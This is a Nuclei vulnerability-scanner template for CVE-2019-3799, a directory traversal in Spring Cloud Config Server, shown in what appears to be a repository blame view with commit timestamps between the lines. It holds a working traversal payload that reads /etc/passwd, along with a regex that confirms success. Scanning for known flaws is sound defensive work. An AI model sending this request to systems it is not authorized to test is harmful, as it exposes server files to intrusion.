nuclei-templates/cves/2019/CVE-2019-3799.yaml

21 lines
444 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-3799
2020-06-22 13:35:37 +00:00
info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
2021-03-18 07:54:36 +00:00
tags: cve,cve2019,lfi
2020-06-22 13:35:37 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
matchers-condition: and
2020-06-22 13:35:37 +00:00
matchers:
- type: status
status:
2020-06-22 21:52:51 +00:00
- 200
2020-06-22 13:35:37 +00:00
- type: regex
regex:
2020-06-22 21:52:51 +00:00
- 'root:[x*]:0:0:'
2020-06-22 13:35:37 +00:00
part: body